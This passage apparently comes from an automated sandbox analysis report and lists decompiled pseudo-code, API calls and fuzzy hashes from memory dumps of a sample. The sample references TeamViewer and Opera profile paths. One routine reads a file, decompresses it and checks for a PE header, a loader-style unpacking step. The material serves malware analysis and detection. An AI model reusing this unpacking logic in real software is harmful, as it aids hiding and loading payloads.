				intOrPtr* _t108;
				intOrPtr* _t111;
				void* _t150;
				void* _t151;
				void* _t153;
				intOrPtr* _t154;
				void* _t156;
				intOrPtr _t157;
				intOrPtr* _t158;

				_t158 = __imp__CoCreateInstance;
				_push( &_v16);
				_push(0x6f33e08c);
				_push(1);
				_push(0);
				_push(0x6f33e0cc);
				_v12 = 0;
				_v4 = 0;
				_v16 = 0;
				if( *_t158() < 0) {
					L26:
					return _v32;
				}
				_t67 = _v36;
				_v40 = 0;
				_push( &_v40);
				_push(_t67);
				if( *((intOrPtr*)( *((intOrPtr*)( *_t67 + 0x1c))))() < 0) {
					L25:
					_t70 = _v44;
					 *((intOrPtr*)( *((intOrPtr*)( *_t70 + 8))))(_t70);
					if(_v36 != 0) {
						return 1;
					}
					goto L26;
				}
				_t73 = _v48;
				_v52 = 0;
				_push( &_v52);
				_push(_t73);
				if( *((intOrPtr*)( *((intOrPtr*)( *_t73 + 0x1c))))() < 0) {
					L24:
					_t76 = _v56;
					 *((intOrPtr*)( *((intOrPtr*)( *_t76 + 8))))(_t76);
					goto L25;
				} else {
					_t78 = _v60;
					_v44 = 0;
					_push( &_v44);
					_push(_t78);
					if( *((intOrPtr*)( *((intOrPtr*)( *_t78 + 0x20))))() >= 0 && _v52 != 0) {
						_v48 = 1;
					}
					_t81 = _v68;
					_v72 = 0;
					_push( &_v72);
					_push(_t81);
					if( *((intOrPtr*)( *((intOrPtr*)( *_t81 + 0x50))))() < 0) {
						L23:
						_t84 = _v76;
						 *((intOrPtr*)( *((intOrPtr*)( *_t84 + 8))))(_t84);
						goto L24;
					}
					_t154 = __imp__#2;
					_t151 =  *_t154(_v44, _t150, _t153);
					if(_t151 == 0) {
						L22:
						_t87 = _v84;
						 *((intOrPtr*)( *((intOrPtr*)( *_t87 + 8))))(_t87);
						goto L23;
					}
					_t89 = _v84;
					_push( &_v88);
					_v88 = 0;
					_push(_t151);
					_push(_t89);
					if( *((intOrPtr*)( *((intOrPtr*)( *_t89 + 0x28))))() < 0) {
						if(_v64 != 0) {
							_t156 =  *_t154(_v56);
							if(_t156 != 0) {
								_push( &_v104);
								_push(0x6f33e05c);
								_push(1);
								_push(0);
								_push(0x6f33e0ac);
								if( *_t158() >= 0) {
									_t94 = _v124;
									 *((intOrPtr*)( *((intOrPtr*)( *_t94 + 0x28))))(_t94, _t151);
									_t97 = _v132;
									 *((intOrPtr*)( *((intOrPtr*)( *_t97 + 0x20))))(_t97, _t156);
									_t99 = _v136;
									_push(_v140);
									_push(_t99);
									if( *((intOrPtr*)( *((intOrPtr*)( *_t99 + 0x20))))() >= 0) {
										_v128 = 1;
									}
									_t102 = _v148;
									 *((intOrPtr*)( *((intOrPtr*)( *_t102 + 8))))(_t102);
								}
								__imp__#6(_t156);
							}
						}
						L21:
						__imp__#6(_t151);
						goto L22;
					}
					_t157 = _v52;
					if(_t157 == 0) {
						_t108 = _v100;
						_v80 = 0;
						 *((intOrPtr*)( *((intOrPtr*)( *_t108 + 0x44))))(_t108,  &_v80);
						if(_v88 == 0) {
							_t111 = _v108;
							 *((intOrPtr*)( *((intOrPtr*)( *_t111 + 0x48))))(_t111, 0xffffffff);
						}
					}
					_t104 = _v100;
					_v80 = 1;
					 *((intOrPtr*)( *((intOrPtr*)( *_t104 + 8))))(_t104);
					if(_t157 != 0) {
						_t106 = _v100;
						 *((intOrPtr*)( *((intOrPtr*)( *_t106 + 0x24))))(_t106, _t151);
					}
					goto L21;
				}
			}






















































                                                                                                                        0x6f334a25
                                                                                                                        0x6f334a2f
                                                                                                                        0x6f334a30
                                                                                                                        0x6f334a37
                                                                                                                        0x6f334a39
                                                                                                                        0x6f334a3a
                                                                                                                        0x6f334a3f
                                                                                                                        0x6f334a43
                                                                                                                        0x6f334a47
                                                                                                                        0x6f334a4f
                                                                                                                        0x6f334c1d
                                                                                                                        0x00000000
                                                                                                                        0x6f334c1d
                                                                                                                        0x6f334a55
                                                                                                                        0x6f334a5d
                                                                                                                        0x6f334a63
                                                                                                                        0x6f334a64
                                                                                                                        0x6f334a6c
                                                                                                                        0x6f334c06
                                                                                                                        0x6f334c06
                                                                                                                        0x6f334c10
                                                                                                                        0x6f334c1b
                                                                                                                        0x6f334c26
                                                                                                                        0x6f334c26
                                                                                                                        0x00000000
                                                                                                                        0x6f334c1b
                                                                                                                        0x6f334a72
                                                                                                                        0x6f334a7a
                                                                                                                        0x6f334a80
                                                                                                                        0x6f334a81
                                                                                                                        0x6f334a89
                                                                                                                        0x6f334bfa
                                                                                                                        0x6f334bfa
                                                                                                                        0x6f334c04
                                                                                                                        0x00000000
                                                                                                                        0x6f334a8f
                                                                                                                        0x6f334a8f
                                                                                                                        0x6f334a97
                                                                                                                        0x6f334a9d
                                                                                                                        0x6f334a9e
                                                                                                                        0x6f334aa6
                                                                                                                        0x6f334aaf
                                                                                                                        0x6f334aaf
                                                                                                                        0x6f334ab7
                                                                                                                        0x6f334abf
                                                                                                                        0x6f334ac5
                                                                                                                        0x6f334ac6
                                                                                                                        0x6f334ace
                                                                                                                        0x6f334bee
                                                                                                                        0x6f334bee
                                                                                                                        0x6f334bf8
                                                                                                                        0x00000000
                                                                                                                        0x6f334bf8
                                                                                                                        0x6f334ad9
                                                                                                                        0x6f334ae3
                                                                                                                        0x6f334ae7
                                                                                                                        0x6f334be0
                                                                                                                        0x6f334be0
                                                                                                                        0x6f334bea
                                                                                                                        0x00000000
                                                                                                                        0x6f334bed
                                                                                                                        0x6f334aed
                                                                                                                        0x6f334af5
                                                                                                                        0x6f334af6
                                                                                                                        0x6f334aff
                                                                                                                        0x6f334b00
                                                                                                                        0x6f334b05
                                                                                                                        0x6f334b68
                                                                                                                        0x6f334b71
                                                                                                                        0x6f334b75
                                                                                                                        0x6f334b7b
                                                                                                                        0x6f334b7c
                                                                                                                        0x6f334b81
                                                                                                                        0x6f334b83
                                                                                                                        0x6f334b84
                                                                                                                        0x6f334b8d
                                                                                                                        0x6f334b8f
                                                                                                                        0x6f334b9a
                                                                                                                        0x6f334b9c
                                                                                                                        0x6f334ba7
                                                                                                                        0x6f334ba9
                                                                                                                        0x6f334bb3
                                                                                                                        0x6f334bb4
                                                                                                                        0x6f334bbc
                                                                                                                        0x6f334bbe
                                                                                                                        0x6f334bbe
                                                                                                                        0x6f334bc6
                                                                                                                        0x6f334bd0
                                                                                                                        0x6f334bd0
                                                                                                                        0x6f334bd3
                                                                                                                        0x6f334bd3
                                                                                                                        0x6f334b75
                                                                                                                        0x6f334bd9
                                                                                                                        0x6f334bda
                                                                                                                        0x00000000
                                                                                                                        0x6f334bda
                                                                                                                        0x6f334b07
                                                                                                                        0x6f334b0d
                                                                                                                        0x6f334b0f
                                                                                                                        0x6f334b17
                                                                                                                        0x6f334b22
                                                                                                                        0x6f334b29
                                                                                                                        0x6f334b2b
                                                                                                                        0x6f334b37
                                                                                                                        0x6f334b37
                                                                                                                        0x6f334b29
                                                                                                                        0x6f334b39
                                                                                                                        0x6f334b43
                                                                                                                        0x6f334b4b
                                                                                                                        0x6f334b4f
                                                                                                                        0x6f334b55
                                                                                                                        0x6f334b60
                                                                                                                        0x6f334b60
                                                                                                                        0x00000000
                                                                                                                        0x6f334b4f

                                                                                                                        APIs
                                                                                                                        • CoCreateInstance.OLE32(6F33E0CC,00000000,00000001,6F33E08C,?,00000000,?,?,?,?,6F334C6B,?,?,?,00000001), ref: 6F334A4B
                                                                                                                        • SysAllocString.OLEAUT32(?), ref: 6F334AE1
                                                                                                                        • SysAllocString.OLEAUT32(?), ref: 6F334B6F
                                                                                                                        • CoCreateInstance.OLE32(6F33E0AC,00000000,00000001,6F33E05C,?,?,?,?,6F334C6B,?,?,?,00000001), ref: 6F334B89
                                                                                                                        • SysFreeString.OLEAUT32(00000000), ref: 6F334BD3
                                                                                                                        • SysFreeString.OLEAUT32(00000000), ref: 6F334BDA
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000003.00000002.754490413.000000006F331000.00000020.00020000.sdmp, Offset: 6F330000, based on PE: true
                                                                                                                        • Associated: 00000003.00000002.754474115.000000006F330000.00000002.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.754512937.000000006F33D000.00000002.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.754530015.000000006F340000.00000004.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.754546355.000000006F341000.00000002.00020000.sdmp Download File
                                                                                                                        Similarity
                                                                                                                        • API ID: String$AllocCreateFreeInstance
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 391255401-0
                                                                                                                        • Opcode ID: 27776237add88c83c724e507bfb15f5ddc85e7989fd377564a46f10d46d49d68
                                                                                                                        • Instruction ID: 359980d816cf8c03f42de83bd4fb8e16698a513408babbae4aae24d11eee666f
                                                                                                                        • Opcode Fuzzy Hash: 27776237add88c83c724e507bfb15f5ddc85e7989fd377564a46f10d46d49d68
                                                                                                                        • Instruction Fuzzy Hash: BA61C0B6604396AFD700DF99C880A5AB7E9BFC9304F104A5DF5998B250D732EC46CB62
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Function 6F332260, Relevance: 9.1, APIs: 6, Instructions: 84filememoryCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        C-Code - Quality: 100%
                                                                                                                        			E6F332260(CHAR* _a4, long* _a8) {
				long _v4;
				long _v8;
				void* _t21;
				long _t27;
				intOrPtr* _t30;
				void* _t33;

				_t21 = CreateFileA(_a4, 0x80000000, 1, 0, 3, 0x80, 0);
				if(_t21 == 0xffffffff) {
					return 0;
				} else {
					_t27 = GetFileSize(_t21, 0);
					if(_t27 == 0) {
						return 0;
					} else {
						_t33 = VirtualAlloc(0, _t27, 0x1000, 4);
						if(_t33 == 0) {
							L6:
							return 0;
						} else {
							_v4 = 0;
							ReadFile(_t21, _t33, _t27,  &_v4, 0);
							CloseHandle(_t21);
							_v8 = 0;
							_t30 = E6F332190(_t33, _t27,  &_v8);
							VirtualFree(_t33, 0, 0x8000);
							if(_t30 == 0 ||  *_t30 != 0x5a4d) {
								goto L6;
							} else {
								 *_a8 = _v8;
								return _t30;
							}
						}
					}
				}
			}









                                                                                                                        0x6f332282
                                                                                                                        0x6f332287
                                                                                                                        0x6f332335
                                                                                                                        0x6f33228d
                                                                                                                        0x6f332296
                                                                                                                        0x6f33229a
                                                                                                                        0x6f33232d
                                                                                                                        0x6f3322a0
                                                                                                                        0x6f3322af
                                                                                                                        0x6f3322b3
                                                                                                                        0x6f33231c
                                                                                                                        0x6f332324
                                                                                                                        0x6f3322b5
                                                                                                                        0x6f3322bf
                                                                                                                        0x6f3322c7
                                                                                                                        0x6f3322ce
                                                                                                                        0x6f3322db
                                                                                                                        0x6f3322f3
                                                                                                                        0x6f3322f5
                                                                                                                        0x6f3322fd
                                                                                                                        0x00000000
                                                                                                                        0x6f332309
                                                                                                                        0x6f332315
                                                                                                                        0x6f33231b
                                                                                                                        0x6f33231b
                                                                                                                        0x6f3322fd
                                                                                                                        0x6f3322b3
                                                                                                                        0x6f33229a

                                                                                                                        APIs
                                                                                                                        • CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 6F33227C
                                                                                                                        • GetFileSize.KERNEL32(00000000,00000000), ref: 6F332290
                                                                                                                        • VirtualAlloc.KERNEL32(00000000,00000000,00001000,00000004), ref: 6F3322A9
                                                                                                                        • ReadFile.KERNEL32 ref: 6F3322C7
                                                                                                                        • CloseHandle.KERNEL32(00000000), ref: 6F3322CE
                                                                                                                          • Part of subcall function 6F332190: VirtualAlloc.KERNEL32(00000000,?,00001000,00000004), ref: 6F3321BA
                                                                                                                          • Part of subcall function 6F332190: RtlDecompressBuffer.NTDLL(00000002,00000000,?,?,?,?), ref: 6F3321D1
                                                                                                                          • Part of subcall function 6F332190: VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 6F3321E5
                                                                                                                        • VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 6F3322F5
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000003.00000002.754490413.000000006F331000.00000020.00020000.sdmp, Offset: 6F330000, based on PE: true
                                                                                                                        • Associated: 00000003.00000002.754474115.000000006F330000.00000002.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.754512937.000000006F33D000.00000002.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.754530015.000000006F340000.00000004.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.754546355.000000006F341000.00000002.00020000.sdmp Download File
                                                                                                                        Similarity
                                                                                                                        • API ID: Virtual$File$AllocFree$BufferCloseCreateDecompressHandleReadSize
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 3075244933-0
                                                                                                                        • Opcode ID: ed6703f9a434242c1575f5fd6bebbe72632ada6202ba3f579932b8e4c94ddcb3
                                                                                                                        • Instruction ID: 9da5b79b79cb42aab962a2fd186ff172f70713cce5bba903bec4399c73d9ee20
                                                                                                                        • Opcode Fuzzy Hash: ed6703f9a434242c1575f5fd6bebbe72632ada6202ba3f579932b8e4c94ddcb3
                                                                                                                        • Instruction Fuzzy Hash: DE212B3770076067D6209A65AC49F8B7BADEBC5B32F10051AF904D7280E675E41987F1
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Function 6F332190, Relevance: 9.1, APIs: 6, Instructions: 79memoryCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        C-Code - Quality: 100%
                                                                                                                        			E6F332190(void* _a4, long _a8, intOrPtr* _a12) {
				long _v4;
				long _v8;
				intOrPtr* _v22;
				long _v30;
				intOrPtr _v42;
				intOrPtr _t18;
				long _t34;
				void* _t35;
				void* _t36;
				void* _t37;

				_t37 = _a4;
				_t34 = _a8;
				_v8 = 0;
				_v4 = 0;
				do {
					_t36 = VirtualAlloc(0, _t34, 0x1000, 4);
					if(_t36 == 0) {
						goto L4;
					} else {
						if(RtlDecompressBuffer(2, _t36, _t34, _t37, _a8,  &_v8) != 0xc0000242) {
							_t35 = VirtualAlloc(0, _v30, 0x1000, 4);
							if(_t35 == 0) {
								break;
							} else {
								RtlMoveMemory(_t35, _t36, _v30);
								VirtualFree(_t36, 0, 0x8000);
								 *_v22 = _v42;
								return _t35;
							}
						} else {
							VirtualFree(_t36, 0, 0x8000);
							_t34 = _t34 + _t34;
							goto L4;
						}
					}
					L8:
					L4:
					_t18 = _v4 + 1;
					_v4 = _t18;
				} while (_t18 < 0x1e);
				 *_a12 = _v8;
				return 0;
				goto L8;
			}













                                                                                                                        0x6f33219b
                                                                                                                        0x6f3321a3
                                                                                                                        0x6f3321a7
                                                                                                                        0x6f3321ab
                                                                                                                        0x6f3321b0
                                                                                                                        0x6f3321bc
                                                                                                                        0x6f3321c0
                                                                                                                        0x00000000
                                                                                                                        0x6f3321c2
                                                                                                                        0x6f3321db
                                                                                                                        0x6f33221f
                                                                                                                        0x6f332223
                                                                                                                        0x00000000
                                                                                                                        0x6f332225
                                                                                                                        0x6f33222c
                                                                                                                        0x6f332239
                                                                                                                        0x6f332247
                                                                                                                        0x6f332252
                                                                                                                        0x6f332252
                                                                                                                        0x6f3321dd
                                                                                                                        0x6f3321e5
                                                                                                                        0x6f3321eb
                                                                                                                        0x00000000
                                                                                                                        0x6f3321eb
                                                                                                                        0x6f3321db
                                                                                                                        0x00000000
                                                                                                                        0x6f3321ed
                                                                                                                        0x6f3321f1
                                                                                                                        0x6f3321f2
                                                                                                                        0x6f3321f6
                                                                                                                        0x6f332206
                                                                                                                        0x6f33220e
                                                                                                                        0x00000000

                                                                                                                        APIs
                                                                                                                        • VirtualAlloc.KERNEL32(00000000,?,00001000,00000004), ref: 6F3321BA
                                                                                                                        • RtlDecompressBuffer.NTDLL(00000002,00000000,?,?,?,?), ref: 6F3321D1
                                                                                                                        • VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 6F3321E5
                                                                                                                        • VirtualAlloc.KERNEL32(00000000,?,00001000,00000004), ref: 6F33221D
                                                                                                                        • RtlMoveMemory.NTDLL(00000000,00000000,?), ref: 6F33222C
                                                                                                                        • VirtualFree.KERNEL32(00000000,00000000,00008000,00000000,00000000,?), ref: 6F332239
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000003.00000002.754490413.000000006F331000.00000020.00020000.sdmp, Offset: 6F330000, based on PE: true
                                                                                                                        • Associated: 00000003.00000002.754474115.000000006F330000.00000002.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.754512937.000000006F33D000.00000002.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.754530015.000000006F340000.00000004.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.754546355.000000006F341000.00000002.00020000.sdmp Download File
                                                                                                                        Similarity
                                                                                                                        • API ID: Virtual$AllocFree$BufferDecompressMemoryMove
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 201667072-0
                                                                                                                        • Opcode ID: f628c9c3d51b27a6f5a14c2dbf19b380472e5a08b4a194fd9b50bc0a2a10a746
                                                                                                                        • Instruction ID: 1ffc6b527c721d7b521e819dfbfee453cf54da3b88b65d014aa4ecc915c3e9fa
                                                                                                                        • Opcode Fuzzy Hash: f628c9c3d51b27a6f5a14c2dbf19b380472e5a08b4a194fd9b50bc0a2a10a746
                                                                                                                        • Instruction Fuzzy Hash: F721AE726443516BD310CE199D41F6BB3E8FBC9B21F10091DF684E7280DB60E8098AA6
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Function 00503AC5, Relevance: 9.0, APIs: 3, Strings: 2, Instructions: 200COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • __EH_prolog3_catch.LIBCMT ref: 00503AD3
                                                                                                                        • _malloc.LIBCMT ref: 00503AFA
                                                                                                                          • Part of subcall function 00537172: __FF_MSGBANNER.LIBCMT ref: 00537195
                                                                                                                          • Part of subcall function 00537172: RtlAllocateHeap.NTDLL(00000000,005343C7,00000000,00000002,00000000,?,005343D6,?), ref: 005371EA
                                                                                                                          • Part of subcall function 004A1784: __EH_prolog3.LIBCMT ref: 004A178B
                                                                                                                          • Part of subcall function 004A1784: InitializeCriticalSection.KERNEL32(?,00000004,004BE363,000001F8,?,?,?,0044D2A4,00000002), ref: 004A17A0
                                                                                                                          • Part of subcall function 004A1B0C: __EH_prolog3.LIBCMT ref: 004A1B13
                                                                                                                          • Part of subcall function 004A1B0C: InitializeCriticalSection.KERNEL32(?,00000004,004B59A0,00747890,00000000), ref: 004A1B28
                                                                                                                          • Part of subcall function 004A1BF0: __EH_prolog3.LIBCMT ref: 004A1BF7
                                                                                                                          • Part of subcall function 004A1BF0: EnterCriticalSection.KERNEL32(?,00000004,004BE3C7,00000000,0077C1F8,00000000,000001F8,?,?,?,0044D2A4,00000002), ref: 004A1C05
                                                                                                                          • Part of subcall function 004A1BF0: LeaveCriticalSection.KERNEL32(?,?,?,?,0044D2A4,00000002), ref: 004A1C45
                                                                                                                          • Part of subcall function 004A17BA: __EH_prolog3.LIBCMT ref: 004A17C1
                                                                                                                          • Part of subcall function 004A17BA: DeleteCriticalSection.KERNEL32(?,00000004,004BE908,000001F8,?,?,?,0044D2A4,00000002), ref: 004A17DC
                                                                                                                          • Part of subcall function 004A1C93: __EH_prolog3.LIBCMT ref: 004A1C9A
                                                                                                                          • Part of subcall function 004A1C93: EnterCriticalSection.KERNEL32(00000001,00000004,004A3359,00000008,004BDB63,00747890,00000000,?,?,?,?,?,?,00000001,00747890,00000004), ref: 004A1CA8
                                                                                                                          • Part of subcall function 004A1C93: LeaveCriticalSection.KERNEL32(00000001,?,?,?,?,?,?,00000001,00747890,00000004,?,?,?,?,00000000,00000001), ref: 004A1CC9
                                                                                                                          • Part of subcall function 0050390E: __EH_prolog3.LIBCMT ref: 00503915
                                                                                                                        • __CxxThrowException@8.LIBCMT ref: 00503C2C
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000003.00000002.747256468.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        • Associated: 00000003.00000002.747207388.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749415979.0000000000733000.00000002.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749762818.0000000000805000.00000004.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749786800.0000000000807000.00000008.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749814867.000000000080B000.00000004.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749828681.000000000080C000.00000008.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749850510.000000000080D000.00000004.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749873568.000000000080F000.00000008.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749896361.0000000000810000.00000004.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749924742.0000000000813000.00000008.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749958556.0000000000817000.00000004.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749980954.0000000000818000.00000008.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.750019968.0000000000822000.00000004.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.750062782.0000000000823000.00000008.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.750089388.0000000000826000.00000004.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.750421700.00000000008B2000.00000002.00020000.sdmp Download File
                                                                                                                        Similarity
                                                                                                                        • API ID: CriticalSection$H_prolog3$EnterInitializeLeave$AllocateDeleteException@8H_prolog3_catchHeapThrow_malloc
                                                                                                                        • String ID: HTTP server=$\Opera\Opera\profile\opera6.ini
                                                                                                                        • API String ID: 923398483-1944140675
                                                                                                                        • Opcode ID: 387a58e34ae01eb2f4bdd73280e0e3018b7f31f02a5672f5b804225d7edcb71c
                                                                                                                        • Instruction ID: f7efd1ae7d344062b201b71234a66cc9379c0d9aa8ce31e5eb433115c93659b8
                                                                                                                        • Opcode Fuzzy Hash: 387a58e34ae01eb2f4bdd73280e0e3018b7f31f02a5672f5b804225d7edcb71c
                                                                                                                        • Instruction Fuzzy Hash: 1281C13080418CDADF15EBA4C952BDD7B74AF22308F14419EF806A71E2DB74AF49CB56
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Function 004068E4, Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 142COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • std::_String_base::_Xlen.LIBCPMT ref: 0040694E
                                                                                                                        • char_traits.LIBCPMT ref: 004069A2
                                                                                                                        • char_traits.LIBCPMT ref: 00406A0C
                                                                                                                        • char_traits.LIBCPMT ref: 00406A2F
                                                                                                                          • Part of subcall function 005158D5: _wmemcpy_s.LIBCPMT ref: 005158E4
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000003.00000002.747256468.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        • Associated: 00000003.00000002.747207388.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749415979.0000000000733000.00000002.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749762818.0000000000805000.00000004.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749786800.0000000000807000.00000008.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749814867.000000000080B000.00000004.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749828681.000000000080C000.00000008.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749850510.000000000080D000.00000004.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749873568.000000000080F000.00000008.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749896361.0000000000810000.00000004.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749924742.0000000000813000.00000008.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749958556.0000000000817000.00000004.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749980954.0000000000818000.00000008.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.750019968.0000000000822000.00000004.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.750062782.0000000000823000.00000008.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.750089388.0000000000826000.00000004.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.750421700.00000000008B2000.00000002.00020000.sdmp Download File
                                                                                                                        Similarity
                                                                                                                        • API ID: char_traits$String_base::_Xlen_wmemcpy_sstd::_
                                                                                                                        • String ID: rd@
                                                                                                                        • API String ID: 2185617273-3749284383
                                                                                                                        • Opcode ID: bca752cff46ffc78040003baf4c8dedcbccb0fab70649c740d03560e7920520f
                                                                                                                        • Instruction ID: f5eb2875d0644d7eb7b7846163d203073de6211e0b612176977c0587568a3520
                                                                                                                        • Opcode Fuzzy Hash: bca752cff46ffc78040003baf4c8dedcbccb0fab70649c740d03560e7920520f
                                                                                                                        • Instruction Fuzzy Hash: 7151B5B1200109DFCF14DF68CA848AE77B6FF81354711852EF817AB685DB34E964CB95
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Function 004BD53E, Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 103COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • __EH_prolog3.LIBCMT ref: 004BD55D
                                                                                                                          • Part of subcall function 004A1784: __EH_prolog3.LIBCMT ref: 004A178B
                                                                                                                          • Part of subcall function 004A1784: InitializeCriticalSection.KERNEL32(?,00000004,004BE363,000001F8,?,?,?,0044D2A4,00000002), ref: 004A17A0
                                                                                                                        • GetModuleFileNameW.KERNEL32(00000000,00000000,00000104,00000050), ref: 004BD595
                                                                                                                        • _wcsrchr.LIBCMT ref: 004BD5A1
                                                                                                                          • Part of subcall function 004A1B0C: __EH_prolog3.LIBCMT ref: 004A1B13
                                                                                                                          • Part of subcall function 004A1B0C: InitializeCriticalSection.KERNEL32(?,00000004,004B59A0,00747890,00000000), ref: 004A1B28
                                                                                                                          • Part of subcall function 004A1BF0: __EH_prolog3.LIBCMT ref: 004A1BF7
                                                                                                                          • Part of subcall function 004A1BF0: EnterCriticalSection.KERNEL32(?,00000004,004BE3C7,00000000,0077C1F8,00000000,000001F8,?,?,?,0044D2A4,00000002), ref: 004A1C05
                                                                                                                          • Part of subcall function 004A1BF0: LeaveCriticalSection.KERNEL32(?,?,?,?,0044D2A4,00000002), ref: 004A1C45
                                                                                                                        • CreateDirectoryW.KERNEL32(00000000,00000000,00000000), ref: 004BD646
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000003.00000002.747256468.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        • Associated: 00000003.00000002.747207388.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749415979.0000000000733000.00000002.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749762818.0000000000805000.00000004.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749786800.0000000000807000.00000008.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749814867.000000000080B000.00000004.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749828681.000000000080C000.00000008.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749850510.000000000080D000.00000004.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749873568.000000000080F000.00000008.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749896361.0000000000810000.00000004.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749924742.0000000000813000.00000008.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749958556.0000000000817000.00000004.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749980954.0000000000818000.00000008.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.750019968.0000000000822000.00000004.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.750062782.0000000000823000.00000008.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.750089388.0000000000826000.00000004.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.750421700.00000000008B2000.00000002.00020000.sdmp Download File
                                                                                                                        Similarity
                                                                                                                        • API ID: CriticalH_prolog3Section$Initialize$CreateDirectoryEnterFileLeaveModuleName_wcsrchr
                                                                                                                        • String ID: \TeamViewer
                                                                                                                        • API String ID: 2480491743-4231698710
                                                                                                                        • Opcode ID: a191dd3ec02a7590f31f131ea8e4a6ca8194ebdacd7b562491a6b748903fa322
                                                                                                                        • Instruction ID: 04c1fa282bc66df1466338df8a5312919105ea49e46d02473211885c2902fa9f
                                                                                                                        • Opcode Fuzzy Hash: a191dd3ec02a7590f31f131ea8e4a6ca8194ebdacd7b562491a6b748903fa322
                                                                                                                        • Instruction Fuzzy Hash: E43106B1904248ABDB10EFA4DC55AEEBBB8FF65304F10406FF00697292EB385B05C768
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Function 005037EF, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 88registryCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
